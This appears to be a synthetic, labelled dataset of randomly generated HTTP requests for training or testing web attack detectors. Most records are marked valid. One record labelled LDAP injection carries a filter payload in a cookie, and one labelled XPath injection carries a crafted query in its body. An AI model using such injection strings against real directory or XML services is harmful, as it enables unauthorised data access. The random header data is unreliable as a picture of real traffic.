X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41915
Start - Id: 5173
class: Valid
POST /PdocumentA2NvformmBPQ/nirmtgehrEbOe/rB8xiGHaSe4w.iSHekKo/rDxJurqI8e6YmZTsz/a1OL.e96f3/msIraerhemT/lPmwDN/seost4iee6ege5TAdb3.asmx? HTTP/1.1
Content-Length: 121
Content-Language: p
Content-Encoding: identity
Content-Location: http://i6kAhcf.st/ntnht/llxj/oua8da/eoytsr/buV7gnbu.pl
Content-MD5: NDJtZ0Rzc1VsODVrdW9vdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 19 Sep 05 02:50:13 GMT
Last-Modified: Wed, 16 Sep 09 05:16:16 UTC
Host: www.roaeri.uk
Connection: keep-alive
Accept: image/jpeg;q=0.6, application/*, application/*;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: dn6t-nwn;q=0.0, vdardy-airi
Cache-Control: no-store
Client-ip: 99.98.219.242
Cookie: dWtibrpopeht=t?/g;gnonchoi0pbshJ=c6zg;e92veo=133;gOpLe@=chq
Cookie2: $Version="46"
Date: Mon, 14 Apr 08 08:34:56 CET
ETag: "3LvElF8WO-Ch-AusSu"
Expect: 100-continue
From: SetS@t3y4hiLvh.ch
If-Modified-Since: Tue, 08 Jun 04 14:41:00 GMT
If-Unmodified-Since: Wed, 28 Sep 05 12:27:00 CET
If-Match: "Xhj3sp_53rB61n3Vbh@"
If-None-Match: "_RQlsVhHh.Wl-VQau"
If-Range: Tue, 08 Aug 06 03:13:33 CET
Max-Forwards: 697
MIME-Version: 3.5
Pragma: rnw='ea3'
Proxy-Authorization: Digest uri=http://www.cmgaej.gov/eCna/cIiprpee/gnrena/not5ts.swf
Authorization: Basic aXJlbXRuZDpsdThBcm4=
Range: 28741-
Referer: http://www.ea0h.ch/tf5enwgr/lbhe0cb/lasa/mecgboa.php
TE: chunked,gzip,trailers
Trailer: Authorization
User-Agent: Mozilla/3.2 (Windows; U; Win 9x 9.6; ee-ue; rv:9.0.6) Gecko/43763770
UA-CPU: x86
UA-Disp: 279,387,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 938x1515
Via: 3.4 www.5kmNEet.jpg
Transfer-Encoding: compress
Upgrade: midie/5.1
Warning: 512 www.sdnrh.js "2goR" "Mon, 28 Aug 06 22:43:34 UTC"
X-Forwarded-For: 175.0.173.196
X-Serial-Number: 083639126
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eOtB=u&awec2h>eeh&ooNre8=a'i(pmea&fhbie5eynenn=9KDedGS.Vh&iNap=yY3yr-wtIs&Z2da=i:ssssiwttls&3S6bELc=92942&keh=0

End - Id: 5173
Start - Id: 7663
class: Valid
PUT /lidmbnloesfft/quIeeniBcofov9h/tf5al/6g5Srsohybrez/nzRZF/co6doScyrnndiiwatyx.asmx? HTTP/1.1
Content-Length: 267
Content-Language: aa0h,h5oEsa,pheie
Content-Encoding: compress
Content-Location: http://rnnimtm.fr/ieonp/pw6o/iealamb9/rrigrliw.sh
Content-MD5: S29hNGJhcmxuNG50YWVidA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 16 Jan 08 20:06:04 GMT
Last-Modified: Mon, 14 Jun 04 21:49:24 UTC
Host: 129.170.124.25:4
Connection: litytNj
Accept: image/gif
Accept-Charset: euc-cn;q=0.4, euc-cn;q=0.6, x-mac-korean, windows-1257, windows-1258
Accept-Encoding: identity, gzip;q=0.0, gzip, deflate, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 41.206.202.253
Cookie: za8Gmegsu2=aez
Cookie2: $Version="1"
Date: Fri, 11 Aug 06 22:10:19 GMT
ETag: W/"nwZZrkAXGQpdqZtyCF"
Expect: ge79=oeetHh
From: c3rer@Oormhttx.fr
If-Modified-Since: Sat, 10 Apr 10 03:52:31 CET
If-Unmodified-Since: Mon, 21 Apr 08 02:45:37 UTC
If-Match: "seL6NJsc@IvK4lX"
If-None-Match: *
If-Range: *
Max-Forwards: 02
MIME-Version: 0.6
Pragma: fwi='ubtdg'
Proxy-Authorization: Basic b3A5aXJlZWw6dGZtZWVo
Authorization: Basic b242YWk6RWNhc21z
Range: 011790-
Referer: http://www.elnyp.fr/Rx0ao/tkiorl/sSHdwsk/EdsMto/oeEh1e.bin
TE: deflate
Trailer: Accept
User-Agent: Mozilla/1.4 (compatible; et4tna; Windows NT; ronosoon5y; rxdtOK; vthovasp)
UA-CPU: 68000
UA-Disp: 319,9267,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0413x678
Via: FTP/8.6 222.117.149.130
Transfer-Encoding: gzip
Upgrade: elei/3.8, uih7yT/2.2, o6nf/3.9, 8tygnz/1.0
Warning: 017 54.146.31.35 "emaeavHx" 
X-Forwarded-For: 116.49.9.190
X-Serial-Number: 117057517
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

nneMogsdu=8998301&drsNze4f=iqibcneIwsedbth5d&uas8=15566&sddr=15648770&iftuia=9370576&i9sw9=tv9V6I9B@&cendRrliSa=neqlNnyda2&neN=srraxutWatewIfhflW&aBiv_@htgi=te&t4ehpkgsj=45370097&92r=ze7x~4gvsbetweenuexecSw&eragoxauf0c3=( ei4nfednYfn&lRs6it=52&u966mso7=04700773

End - Id: 7663
Start - Id: 15037
class: Valid
GET /mT0l5fbk.png?LGm9IHuMLl=uiesr2lfsn&DsEjeoaywg=lyyae&mta9rte5xawhs=9&onaegi7msioa=nIdaeuf%2F6eh4p&mweekeg=eOsSC7my&tnoor=2&ArUaH=+e&fJs7OS67R=nayeythm&psUBiFNR0=hde HTTP/1.1
Host: www.artAx.com
Connection: iaghcsue
Accept: audio/basic, text/plain;q=0.2, audio/basic
Accept-Charset: isiri-3342, euc-jp, windows-1254;q=0.7, x-mac-roman
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=68
Client-ip: 40.118.86.87
Cookie: 2ooihhu=;;porsnae3cc=428584;hmiiod3eslpa= having3tmpy
Cookie2: $Version="713"
Date: Wed, 11 Feb 04 10:12:35 UTC
ETag: "q1ErS3VBh4hh9.pklpw"
Expect: 0ealt3eo=su3k1ao;Tm6nnrcd=spfbb9
From: NBko@ilcocf4eu.ch
If-Modified-Since: Wed, 12 May 04 06:11:08 GMT
If-Unmodified-Since: Sun, 30 Oct 05 12:50:43 UTC
If-Match: "QbfMrxPhO7H0Na9"
If-None-Match: *
If-Range: Mon, 23 Oct 06 01:25:20 GMT
Max-Forwards: 6075
MIME-Version: 2.9
Pragma: te='m'
Proxy-Authorization: 0hoNu r7lmg0=wsTsa
Authorization: NTLM bndkaW4waWVZZHJtU3Rtb2VlZ3JlZGFtYTZpd3Y1YW5uZG5uOWVkN2lrVHR5Nw==
Range: 87261-
Referer: http://acdelj.gov/pNda/eetutd/a5fsttbs.php
TE: gzip,deflate;q=0.3,chunked;q=0.8
Trailer: If-Range
User-Agent: leH0otmsec6
UA-CPU: MIPS
UA-Disp: 7976,801,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7618x6392
Via: HTTP/5.2 www.mr9stae.gif, 6.3 215.131.94.113
Transfer-Encoding: deflate
Upgrade: 7pnrhe/1.7, tyytsb/2.7, rnTs/2.9, cgit/1.6, tek/9.5
Warning: 661 152.187.129.71 "lnNahtrioImlhbiy" 
X-Forwarded-For: 161.230.118.153
X-Serial-Number: 958943826904140
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15037
Start - Id: 37465
class: LdapInjection
GET /tlirawezr/gY13i1/agsut/zidUgfig38aiI/iNp.j3/m4osnAi/sSgcne/gelhreNnmheelet.cgi?Rluhrcs=tV__nG%400N6&iaerseaeteptpN=dtedigeViuizah7ru&ct34haodKd4qau=1020059&NCyB=30188&6Y.AFsock_streamEBMyyC=eyr%2B&hitamm=04859138 HTTP/1.1
Host: 68.242.206.122:80
Connection: close
Accept: application/rtf, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=92
Client-ip: 97.241.16.223
Cookie: lchvtdT6amve=mFJONCEsFWhj;zwi0O3m4utforby=")(targetfilter=(o=NetscapeRoot))
Cookie2: $Version="30"
Date: Tue, 09 Jun 09 02:13:18 UTC
ETag: W/"V8R_45eWVLFPfXgmsM7e"
Expect: xeilyu=t8r8Bikn;huTb=yonIs
From: 7EAiyd@ttlgtqrt.st
If-Modified-Since: Fri, 11 Mar 05 19:57:33 CET
If-Unmodified-Since: Sun, 27 Feb 05 15:27:25 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
Pragma: no-cache
Authorization: eatat 1syaa=Miesi
Range: 2-927066
Referer: /its7a/8adn/dslsehet/UhMrtrn.exe
TE: trailers
Trailer: If-Range
User-Agent: c13EzZD0Qd http://www.Ucoas.biz
UA-CPU: x86
UA-OS: Win9x
UA-Pixels: 9871x247
Via: HTTP/5.7 212.10.12.251, 5.7 www.Isfq9L2.htm:43, 9.2 www.tsskfa.htm
Transfer-Encoding: identity
Upgrade: vho/1.5, edT5k/9.2, ekS/7.1
Warning: 084 221.225.214.82 "apGeti6neO" 
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37465
Start - Id: 16526
class: Valid
GET /e8yutsd7leG/hs1t/aPYoM18u-/A313oKevalZngHrvY_.jsp?soert=64&4ad=e%3Fnnmchttp+a&ta7gSmgte=08380&D_mnullTZr=tAnO HTTP/1.1
Host: 68.36.140.64
Connection: close
Accept: video/quicktime;q=0.0, video/quicktime, audio/basic
Accept-Charset: iso-2022-kr
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 44.44.205.18
Cookie: wetite=9
Cookie2: $Version="711"
Date: Thu, 09 Aug 07 18:17:00 CET
ETag: "8@@_rDJfLh2KrzmP20"
Expect: 100-continue
From: a3hb@rjzaoeAala.com
If-Modified-Since: Thu, 24 Feb 05 02:09:10 UTC
If-Unmodified-Since: Sat, 30 Dec 06 21:47:27 GMT
If-Match: "nu2hyFXfQVxdFVbPDFYf"
If-None-Match: "eTY9QJVEJ1Ql@5WT3"
If-Range: Wed, 30 Jan 08 16:55:43 CET
Max-Forwards: 0215
MIME-Version: 0.5
Pragma: t=ptlaenh
Proxy-Authorization: OeomE lOouinza=iyto
Authorization: Digest uri=/s8ai/0oph72aO/rlM7lU2o.gif
Range: 6-18279,-9207,2-
Referer: /nlfdri/nclronta/Iaxuesc/ovnoNta.gz
TE: chunked
Trailer: If-Range
User-Agent: Mozilla/4.5 (X11; U; Open BSD i386 1.3; wC-np; rv:8.0.1) Gecko/53301325
UA-CPU: StrongARM
UA-Disp: 439,238,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 599x133
Via: 5.0 58.159.6.220:918
Transfer-Encoding: compress
Upgrade: lwl/7.6, pratqs/7.3
Warning: 376 www.ycezutrm.jpg "nens" "Mon, 03 Mar 08 23:13:28 GMT"
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 05592727151
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16526
Start - Id: 32980
class: Valid
PUT /r853MpJM18CvbU/lSqKo/foLT3kyI7UjpRonc4B9P/pQe/eZI@RU3qxr5yTCBbR/Eiuxtehlnrebafvew87/tdYgSiVoH1PQ/w9s/ahr1q/aU8L6XD/cnicmma/jsAw4LblPiUVEua2rO-o.tiff? HTTP/1.1
Content-Length: 120
Content-Language: E5rwnte
Content-Encoding: gzip
Content-Location: /atlce2/5sAbhenw/Aegrn/9ntrV3ef.cgi
Content-MD5: Nm5iZUFwZGJmQW5hc3AxaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 10 Nov 07 20:53:04 GMT
Last-Modified: Fri, 28 Jan 05 21:28:51 GMT
Host: www.hetnd.it
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: min-fresh=3
Client-ip: 8.2.103.176
Cookie: OSL9Ut=AOa;ergn=9fkwljd;n6aqaiqeka9=inputqntyh;nnoseweoht5WnD=0;iledCi4niwb65mm=hnex
Cookie2: $Version="812"
Date: Sat, 06 Jan 07 03:27:03 CET
ETag: "EMmTTUQgw._4u3x1Bat"
Expect: 100-continue
From: eoiw@ba5rdx.uk
If-Modified-Since: Sat, 08 Jan 05 16:52:00 CET
If-Unmodified-Since: Sat, 25 Feb 06 16:45:26 UTC
If-Match: *
If-None-Match: "gkGTFcEuHDYMPU9lRv"
If-Range: "i8R5gQ0K4U@C7e0"
Max-Forwards: 0
MIME-Version: 9.1
Pragma: nWs=cio
Proxy-Authorization: Basic YXNPbnphU2E6YXR0QmV4dWQ=
Authorization: Basic VGdsNGE6OWljZ25y
Range: -5326
Referer: /cmejawr/enqti/oeH7/dtnhstI/auduerr.nsf
TE: trailers,chunked;q=0.3,trailers
Trailer: Referer
User-Agent: Mozilla/5.9 (compatible; vaupNnn; Windows NT; oeMs; i1TtSsaj2)
UA-CPU: MIPS
UA-Disp: 8787,462,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 596x2213
Via: 1.5 55.95.171.245, 4.5 174.32.219.68
Transfer-Encoding: deflate
Upgrade: w9s/7.1, 3ornaa/6.9, gutsa1/0.6, ilDi/2.2, imano/5.6
Warning: 960 www.dvr2eom.js:20 "esme5cmn4diad" 
X-Forwarded-For: 225.92.175.53
X-Serial-Number: 62410
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

eAaYrEEyalt7s=m:udReroec&nDessde=imn&hj=obIiXA&0ag4wgetZF=eGp-3a&HP=92821728&qhnraiii7olpe=3091&surrdNOnagb0nt=1?eeu

End - Id: 32980
Start - Id: 48654
class: XPathInjection
POST /tYN@C/jZT/d9Jl8DeDVagA.ZjCt4KA/u3A@@Uw/nwtrpognnoteatm/eK1/ltedn4rgAn0ehthron/taruGo/etNNgwehgzFc@f/9SZXKyt_8K/eeejsE.jpg? HTTP/1.1
Content-Length: 183
Content-Language: e
Content-Encoding: gzip
Content-Location: /eselhpE0/lMiae/iydi/Nc1i4/ythrIs.cgi
Content-MD5: NTV5c296cnVPcm5pcmVuZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 02 Sep 09 09:03:32 GMT
Last-Modified: Sun, 12 Dec 04 16:00:11 CET
Host: 24.233.222.23
Connection: close
Accept: */*
Accept-Charset: macintosh;q=0.6, iso-10646-ucs-2;q=0.5, macintosh, windows-874;q=0.7
Accept-Encoding: identity, identity, gzip;q=0.7
Accept-Language: *
Cache-Control: no-transform
Client-ip: 125.212.241.80
Cookie: ddntLaee=oSZvb;Agonee4p1twdwta=d'oj;zesdor6d=s1gs
Cookie2: $Version="57"
Date: Sun, 27 Mar 05 20:41:49 CET
ETag: W/"QyHg7ulSwO5be0D"
Expect: 100-continue
From: eta3@rewxn.biz
If-Modified-Since: Mon, 04 Oct 04 20:56:05 UTC
If-Unmodified-Since: Mon, 18 May 09 12:48:41 CET
If-Match: "YvRWPJX80Ay0082MT2"
If-None-Match: *
If-Range: Sun, 05 Apr 09 10:23:32 GMT
Max-Forwards: 3676
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Tbena sv18tb=rrtc1i
Authorization: Digest nc=FF568b5A
Range: -046912,8351-4,007308-22
Referer: /1icdg/adeuhXdm/ed5o/aana0.cgi
TE: trailers,deflate,gzip
Trailer: TE
User-Agent: uao16e (9HsY.3qhw2)
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 090x151
Via: 6.3 www.idoe6.jpg, HTTP/2.1 83.166.180.82
Transfer-Encoding: gzip
Upgrade: Bkmi/2.1, eLo/9.3
Warning: 958 171.58.48.221:65022 "tbsyeeovlI4la7he" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 2534410035139389
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

Pbeeklniiwi=(i   <     count(gMre/child::text()) and j    <  count(gnitee/child::comment())    and     k   <   count(02s1/child::*)   )

End - Id: 48654
Start - Id: 24807
class: Valid
GET /ls/5os2iyepixurhare/ns4thpt21/enLlselesec/eZOgexTs/mohlmifns/tfiurzrT/kv@admin1/jhkoe0S/a8risrcvlmnmoeoa/iLHCYn49.RW_DOx.gif?erTzcrhWricys2z=R%28%40hr8aaehr%5C&0edo4ozm=0&gDtearsoahemeop=v6KGY7bh7c&gc3typo=xroPOxKjPs-&5Eupgdnvuedg=Mkeysnrpes&cnr=126166&ut=gX4&9lAeia=6598515&ciesee=eumHrwnmhsta0&ytrhlRn=r%405PWc-&noi=459846&r8sttdoamttitp=786034 HTTP/1.0
Host: 104.16.179.254
Connection: 44pa
Accept: image/*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tt3e-tvyh, Loer5ao-oofeor5;q=0.4
Cache-Control: no-store
Client-ip: 222.92.138.8
Cookie: s5siits8=oscript9i
Cookie2: $Version="585"
Date: Fri, 30 Mar 07 23:21:34 GMT
ETag: W/"3M.kholm9_fIPRMrv"
Expect: xvtn0h5a=soSv
From: iesi0goR@Pnih.ch
If-Modified-Since: Tue, 23 May 06 24:26:37 GMT
If-Unmodified-Since: Thu, 04 Aug 05 15:41:05 CET
If-Match: "E-H7hOv.gf7-3PS"
If-None-Match: *
If-Range: *
Max-Forwards: 8340
MIME-Version: 1.4
Pragma: moxmil=6Yd0
Proxy-Authorization: eavp 4smsS=trdyaIt
Authorization: Digest cnonce="Eblshe"
Range: -4,93-96
Referer: http://7thbheh.st/uue15km/h7Igthw/gmseohu.jpeg
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: Mozilla/6.8 (compatible; MSIE 3.1; WinNT; ltirm; usrEbdeotE; erdyrIloy)
UA-CPU: x86
UA-Disp: 1309,0345,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3792x2228
Via: 9.1 185.48.117.188, HTTP/9.3 163.36.210.43, uerr/1.9 51.174.19.139
Transfer-Encoding: identity
Upgrade: el2el/2.8, son/5.5, hnnix/9.5, aepgeh/9.4, Amh/9.2
Warning: 242 103.81.240.13 "nIooeeg" "Mon, 29 Aug 05 22:00:16 CET"
X-Forwarded-For: 21.89.90.200
X-Serial-Number: 2608938544154146397
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24807
Start - Id: 17757
class: Valid
GET /nX5b2w./iul7uioi0ess/ru0dHk4iiaass0ceuqne/shao3s4n3suwaiiIkt/Ml2locationwpslmetanullAcFrmU/9mK1ta@1JbFu270E/cqq@z3/o6U2z6rwFsoh_Dt-/e2zrOSirozh.mspx? HTTP/1.0
Host: 130.184.145.215
Connection: keep-alive
Accept: text/*;q=0.5, text/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: L='trzi'
Client-ip: 28.227.18.202
Cookie: eiBdVid.=tDn;enA9qou4gtcc=5646314;nomerabdalSadl0=snodeo
Cookie2: $Version="6"
Date: Sat, 09 Feb 08 15:25:09 GMT
ETag: W/"6T-UV58Q1lySKbMrK7"
Expect: 100-continue
From: sasiSWt@adm5.be
If-Modified-Since: Thu, 11 Sep 08 05:57:47 CET
If-Unmodified-Since: Mon, 11 Apr 05 18:13:29 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 14 Sep 08 01:19:28 CET
Max-Forwards: 367
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic YWhpdHNmUjpjcklPUnU4aQ==
Range: 33-,5-4,824-
Referer: /zwpv/iiiiin9/tPdwrn/AAbshs/oephdwc.jpeg
TE: trailers,trailers,gzip;q=0.7
Trailer: Expect
User-Agent: gi7TttzEn/8.0
UA-CPU: x86
UA-Disp: 192,3054,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 582x198
Via: HTTP/3.8 108.160.143.167:1584
Transfer-Encoding: gzip
Upgrade: ZHn/3.1
Warning: 678 11.137.65.227 "evit8rnat97eUs" "Fri, 07 Oct 05 12:11:03 CET"
X-Forwarded-For: 105.19.29.209
X-Serial-Number: 197606037
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17757
Start - Id: 15801
class: Valid
GET /D3eQ9/c8tmeo9sst/andzgBTmochaRVZ3MlnF/7y/srexupteaiaDe/tnqdldhlf0eoUosafYr/te0na7itimme8/e2_5ek9ZO./k1ZW51MifqyL2/0390location.NH3aI/kbSoptphphttpstmpGIuTb.php4?vtrPyNrOc=ittr7&uiyea1deymiGwae=5&edeztito=915247081&rnrde8=eelKo&4YHl=htpass%28la%26I&yEfzoar=6084&eus=u%40oith&Emjox=sso+jhs%2B%2Foecho%3Fiputs&0lz=rhn&1Asoensot=brZrseOange&Shve0rh=83296811&usrorRo-=2144&wbTzeatgolaEnha=%7Et&2Ja0CKNcp=php%7Esei+feintind&peco=en HTTP/1.0
Host: 80.37.82.51
Connection: close
Accept: application/postscript, image/jpeg;q=0.3, video/quicktime
Accept-Charset: *
Accept-Encoding: compress;q=0.4, gzip, identity;q=0.9
Accept-Language: o-plo55ns;q=0.8, 75-l5e;q=0.6, mausy6-i2t, attta0-g
Cache-Control: no-store
Client-ip: 204.119.108.46
Cookie: Igkdwongr7yoda=eoogpnO6ttoLu;rtauite9einew3=nsxlote4hitlfp
Cookie2: $Version="340"
Date: Wed, 04 Nov 09 24:09:54 GMT
ETag: "zOsfKvClV6sC1RLsT8nF"
Expect: 100-continue
From: enag0ez@aejbBetotm.com
If-Modified-Since: Wed, 13 Oct 04 09:27:20 CET
If-Unmodified-Since: Sun, 04 Jan 09 01:59:19 UTC
If-Match: *
If-None-Match: "lxlbd1tmk2R.WmJYyUt"
If-Range: *
Max-Forwards: 31
MIME-Version: 4.5
Pragma: ze=iauaora
Proxy-Authorization: Digest uri=http://emrrs.uk/eCsa/atRe/Sh9e/tejtAlw.ace
Authorization: Basic d050ejpsdFduaGQw
Range: -0,-3358,3280-395
Referer: http://www.OReH.be/D1wew/ttnceen/iIsbea7T/hiee5/6Nadiefi.php4
TE: trailers
Trailer: Proxy-Authorization
User-Agent: imMshlmnoqtwI7j6w
UA-CPU: StrongARM
UA-Disp: 3907,1004,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4872x353
Via: 9.2 70.196.45.127:64, FTP/8.5 www.hntx.shtml
Transfer-Encoding: identity
Upgrade: iercSi/3.4, rnry/0.4, onpiw/4.8, bhtr/3.8
Warning: 199 www.itOetlsd.tiff "wotper5eMaRnsi3mHstd" "Sun, 18 May 08 03:17:26 CET"
X-Forwarded-For: 82.201.200.90
X-Serial-Number: 711196444045692
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15801
Start - Id: 34118
class: Valid
POST /aiPcioPxIfOfQ5E/fKQWvrk.2Qe8ImvlSRNb/tenctaevcf5ogewej/nj8@XueupQ.tRQ/XU0eMLdivLl/rccGgsorehsui/wAZlKENbw1Fxd-bN@sB/rltnailddconel/w5/PH54sVobjectNwp-0RPpV.js? HTTP/1.1
Content-Length: 302
Content-Language: rp,t,n
Content-Encoding: compress
Content-Location: http://eO0yem.net/rt7otha/aeid48th/tcinlsIc/eOggi.asmx
Content-MD5: bGxxVHdpbU5zc2V0c0tyZw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 Nov 05 19:24:11 GMT
Last-Modified: Thu, 10 Jun 04 22:30:17 GMT
Host: 1.142.201.87:08270
Connection: nsbht8
Accept: */*
Accept-Charset: x-mac-turkish;q=0.0
Accept-Encoding: 
Accept-Language: babze-f;q=0.9, stuxS-vOleufev, ipsxl-Gaa, rtt-d3t0ooee
Cache-Control: max-age=0382
Client-ip: 66.198.113.70
Cookie: gegoe=lRFOBrRd;nreseeS=8869736;uwNcrismNte=aepdrs;oajaiEtliGihhdo=1568;wea=z8kP@
Cookie2: $Version="240"
Date: Mon, 12 Jan 09 10:57:57 UTC
ETag: "-x.WPaEu0H@C67M"
Expect: etwta=fwts6;9czg=3esloi6c
From: uye7h@kdo2f.gov
If-Modified-Since: Mon, 16 Apr 07 14:37:48 GMT
If-Unmodified-Since: Sat, 22 Sep 07 17:04:57 GMT
If-Match: "fvDbi5GS_dZrFKaW"
If-None-Match: "k5BkZf__IwrOdYwx@Z"
If-Range: "EH_b.1F.3uQLhIiELyP"
Max-Forwards: 3
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM aTV0b3NlRWFSdGFzbmxlbmlOaWRoZ3cyc3NhZWd3T3l0emVzdWFGdHpjbGE=
Authorization: NTLM MndjcG5jc2hobmVOaXlFdWJscGVjb3hoUDNJYW82cmRlNW9mczRNZnM=
Range: 60682-89,69-,94-
Referer: /potse/sysota.exe
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: a7nsh2y
UA-CPU: PowerPC
UA-Disp: 654,4575,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3127x6059
Via: 0.9 145.86.79.134, eege7/3.0 228.200.156.137, atu/3.9 65.34.209.48:2950
Transfer-Encoding: identity
Upgrade: e1e/1.0, 4det/7.3, 8t7kr/3.5, cltiom/7.6
Warning: 657 www.eWibEanz.tiff "iaEat" "Mon, 06 Jul 09 07:37:50 GMT"
X-Forwarded-For: 37.174.184.200
X-Serial-Number: 18830507621799
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ikntT6efanO=krew4s&ese4n=i<sl&hRftdejchndTr=ero7o&occinput-X@IsSM7==jh ia[en]bseet&u5nooglah=aii&eifTwccmnoesc=ezTJFC2XV6.&tRw1n=p5ou7&zeanto5n3b=ha&amatoa8sdrmot9=ae:ernasramS&SJ@cRdIrU=jMz8ZX0c6REp&IKOprocessing-instructionN=7840748&gTnI3tssasv=spn?&bndto=tNtbgsound&TdmlaofU=niipi/uftl

End - Id: 34118
Start - Id: 1545
class: Valid
GET /oej7ataddoh6ln9/pDS2lvSRXMT/raun7odrsrooz/lwN/fDuzb/dt2kx6TLvDHCVIOR/pUuQ/lvsdi6u3sa5cdhEusoi/lMuKM/N1IgPndsEMcapJA.cfm?tstbtbsnhnemdDt=oneeaieE&r4v0meoo=ie95n&ietrhdweXr=LcSantuteoTpy8no&iEetsesse2I9hY=803611806&aod=74231&P7jA@Q6KC5=itss&oGgsetormaRtls=824886&4R4=n+s HTTP/1.1
Host: www.x4orAgeRuv.net:80
Connection: keep-alive
Accept: text/html;q=0.8, application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 185.157.234.182
Cookie: 836pQgo4=048;Drmnt4jEeeeda6=renai5urredohal3d;aaenttseesheead=9mailmhnmda4R@1eh;at0yhidi0s=et5mw4a;h8lshnsn8atmee=nrElsagwayh
Cookie2: $Version="0"
Date: Thu, 16 Feb 06 22:53:32 GMT
ETag: "4IjM3sGRGRytMbk.e"
Expect: hen7e=Iher;oae8
From: uared@sesbwap.com
If-Modified-Since: Sat, 02 Jul 05 23:27:22 UTC
If-Unmodified-Since: Thu, 13 Apr 06 01:41:01 UTC
If-Match: "Eh2v8YnYPjEjqJt"
If-None-Match: "9CfJ1PW.IrJ@H-Ks9B"
If-Range: *
Max-Forwards: 70
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic b3lvcnJVenI6VWRIMUQ=
Authorization: NTLM Nnd0aWVtaTRkdHRrOXB1c25ndGhENlJybHR5b2Nicmll
Range: -16609
Referer: http://www.funjnp.biz/enure2/1i5snwu4/andmw38G/gTtcshdU/i5vutlT.nsf
TE: trailers
Trailer: Accept-Charset
User-Agent: ncpsey (hasx6j)
UA-CPU: PowerPC
UA-Disp: 048,2159,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 7934x8697
Via: 1.3 205.244.219.60, joite6/1.4 www.Fll0.css
Transfer-Encoding: gzip
Upgrade: ane/0.8, d9tm/6.0, t3eu/5.9, itbhTr/3.7
Warning: 172 www.gicpsf4l.css "oo512" "Thu, 06 Jul 06 16:00:23 UTC"
X-Forwarded-For: 223.124.189.8
X-Serial-Number: 2858071636366715430
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1545
Start - Id: 22130
class: Valid
GET /1jtniPeuc1rn/m-fKdXZu/ihuda3z8zwdirLlna/iR3mQi4RRqY16f1/tosaa9oxmLn/ahdeAGgEstdT/r3@scYeE2WQD/atusc7letiift/t3ahhtDa7ygKntsch/0Ws@P03CZV5XhYkSt@q.js?xseimtqm=49535719&mposhdrUnreop=6etem%3B&ehEetinnedsRpn0=77883&oahtAseSpsug=31&sjstdbh=oGPVuuQOTI&BdiT9DtsS8oqdee=zcEme&EiihasrersR=NfRsoE4n&metaq-wgetwinntF=t6n7nshb%7EBS7z&tmteot9utspt=oalNthpuyy-p HTTP/1.1
Host: www.enl9nhftaa.st:15
Connection: g5itEvs
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=58
Client-ip: 64.207.74.70
